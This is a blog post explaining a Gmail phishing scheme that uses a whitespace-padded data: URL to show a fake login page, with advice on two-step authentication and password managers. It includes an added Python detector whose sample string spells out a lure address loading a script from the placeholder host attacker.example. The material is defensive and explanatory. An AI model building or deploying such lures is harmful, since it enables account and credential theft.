New Gmail Phishing Attack

There’s a new Gmail phishing attack that has shown up and is reeling in even technically savvy people. It was brought up by Wordfence, a company that we use to protect all of our and our clients’ WordPress sites. These guys are great!

This attack is currently being used to target Gmail customers and is also targeting other services.

The way the attack works is that an attacker will send an email to your Gmail account. That email may come from someone you know who has had their account hacked using this technique. It may also include something that looks like an image of an attachment you recognize from the sender.

You click on the image, expecting Gmail to give you a preview of the attachment. Instead, a new tab opens up and you are prompted by Gmail to sign in again. You glance at the location bar and you see in there. It looks like this….

You go ahead and sign in on a fully functional sign-in page that looks like this:

Once you complete sign-in, your account has been compromised. View the full story…

Essentially, there is a huge blank space between the first part of the URL and the script that comes at the end of it; that script opens a page that looks like the Gmail login page above.
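To make the “blank space in the URL” trick concrete, here is an added Python check (not from the Wordfence report or this post) that inspects a location-bar value for the traits described above: an address that is not a plain https:// URL, a long run of blank characters, and script markup hidden after that padding. It assumes the address is a data: URI, which is how this attack was reported, and the sample addresses and the domain attacker.example are constructed placeholders.

```python
import re
from urllib.parse import urlsplit

# Constructed sample addresses (not taken from the original post).
# attacker.example is a placeholder, not a real indicator.
GENUINE_LOGIN = "https://accounts.google.com/ServiceLogin?service=mail"
PADDED_LOGIN = (
    "data:text/html,https://accounts.google.com/ServiceLogin?service=mail"
    + " " * 200  # the "huge blank space" that pushes the tail out of view
    + "<script src=https://attacker.example/login.js></script>"
)


def inspect_login_url(url: str) -> list[str]:
    """Return the reasons a location-bar value looks suspicious (empty if none).

    Three traits are checked: the scheme is not https, a long run of
    whitespace hides the end of the address, and script markup follows
    that whitespace.
    """
    reasons = []
    scheme = urlsplit(url).scheme.lower()
    if scheme != "https":
        reasons.append(f"scheme is {scheme!r}, not https")
    pad = re.search(r"\s{20,}", url)
    if pad:
        reasons.append(f"{len(pad.group())} blank characters hide the end of the address")
        tail = url[pad.end():]
        if re.search(r"<\s*script", tail, re.IGNORECASE):
            reasons.append("script markup follows the blank space")
    return reasons


def is_safe_login_url(url: str) -> bool:
    """True only when no suspicious trait was found."""
    return not inspect_login_url(url)


if __name__ == "__main__":
    for sample in (GENUINE_LOGIN, PADDED_LOGIN):
        print(sample[:50], "->", inspect_login_url(sample) or "looks genuine")
```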

So, if you are logged into Gmail and it asks you to log in again, don’t.

There are two other ways of avoiding this phishing attack.

One, use 2-step authentication, where you have to enter a code sent to your mobile device before you can log into Gmail. We use this on our Gmail accounts already.

The second, which I asked Wordfence president Mark Maunder about, would be using a password manager like LastPass (which we and our clients use), which would not recognize the URL and so would not fill in the user name and password. We’re not positive about this, though, not having seen it in action.

By the way, these are the same folks at Wordfence that debunked the DNC/John Podesta hack as not necessarily being the Russians. Like I said, these guys know their stuff and I highly recommend Wordfence for a WordPress site. This phishing report is just a sideline for them. They have a free plugin available at and a premium version that preemptively blocks hacking attempts.